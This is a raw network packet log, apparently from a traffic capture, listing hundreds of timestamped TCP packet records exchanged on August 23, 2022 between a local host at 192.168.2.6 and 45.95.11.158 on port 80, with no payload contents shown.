                                                                                                                                                                      Aug 23, 2022 18:26:31.419401884 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419421911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419441938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419452906 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419459105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419464111 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419492006 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419493914 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419500113 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419533968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419552088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419553995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419572115 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419574976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419600964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419611931 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419835091 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419859886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419883013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419884920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419900894 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419904947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419939995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419941902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419950962 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419965029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419986963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419995070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420002937 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420003891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.420027018 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420042992 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420070887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.420104980 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.420114994 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420126915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.420142889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.420145035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420172930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.420180082 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.423155069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.423176050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.423190117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.423197985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.423255920 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.423297882 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.425767899 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.425796986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.425815105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.425829887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.425852060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.425887108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.427445889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427465916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427535057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427539110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.427555084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427572966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427592039 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427607059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.427634954 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.427655935 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.429219007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429243088 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429259062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429271936 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429313898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.429337025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.429343939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429389954 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429393053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.429410934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429436922 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.429461956 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.429646969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.429711103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434102058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434124947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434143066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434155941 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434181929 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434221029 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434525967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434545994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434562922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434576035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434591055 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434597015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434617996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434633017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434640884 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434660912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434685946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434710979 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434736013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434740067 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434746981 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434751034 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434755087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.434767008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434794903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.434807062 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435154915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435174942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435231924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435231924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435249090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435249090 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435313940 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435393095 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435411930 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435429096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435442924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435456991 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435475111 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435506105 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.435944080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435962915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.435980082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436038017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436049938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436052084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436126947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436162949 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436197996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436218023 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436227083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436250925 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436254025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436280012 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436299086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436340094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436391115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.436391115 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436428070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436446905 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.436511040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.439274073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.439302921 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.439368963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.439455032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.439665079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455545902 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455584049 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455612898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455636024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455661058 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455670118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455693960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455708981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455718040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455727100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455749035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455758095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455775976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455796957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455812931 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455833912 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455847025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455866098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455883026 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455899954 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455909967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455935001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455946922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.455957890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.455981016 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456001997 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456017017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456027031 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456044912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456068039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456082106 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456104040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456118107 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456139088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456154108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456171036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456182003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456202984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456224918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456247091 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456268072 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456298113 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456304073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456338882 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456341028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456362963 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456377983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456396103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456403971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456443071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456451893 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456456900 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456476927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456495047 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456512928 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456523895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456540108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456564903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456577063 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456589937 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456610918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456625938 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456645966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456660986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456685066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456720114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456748009 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456752062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456809998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456815004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456854105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456906080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456918001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456953049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.456962109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.456970930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457010031 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457020044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457043886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457070112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457091093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457104921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457137108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457171917 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457187891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457201004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457222939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457250118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457274914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457277060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457317114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457333088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457365036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457375050 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457400084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.457428932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.457454920 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.458465099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.458508968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.458545923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.458579063 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.458591938 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.458616972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.458650112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.460879087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.460910082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.460927010 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.460939884 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461008072 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.461036921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.461627960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461647987 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461666107 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461683989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461724043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461724043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.461743116 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461745024 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.461759090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.461776972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.461811066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.466366053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466398001 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466423988 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466449022 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466471910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.466473103 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466500998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466520071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466542959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466567993 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.466568947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466597080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466614962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.466689110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.466707945 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467004061 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467031956 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467056990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467063904 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467075109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467103958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467156887 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467211008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467235088 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467257023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467269897 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467271090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467293024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467298031 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.467315912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.467324018 CEST4980080192.168.2.645.95.11.158
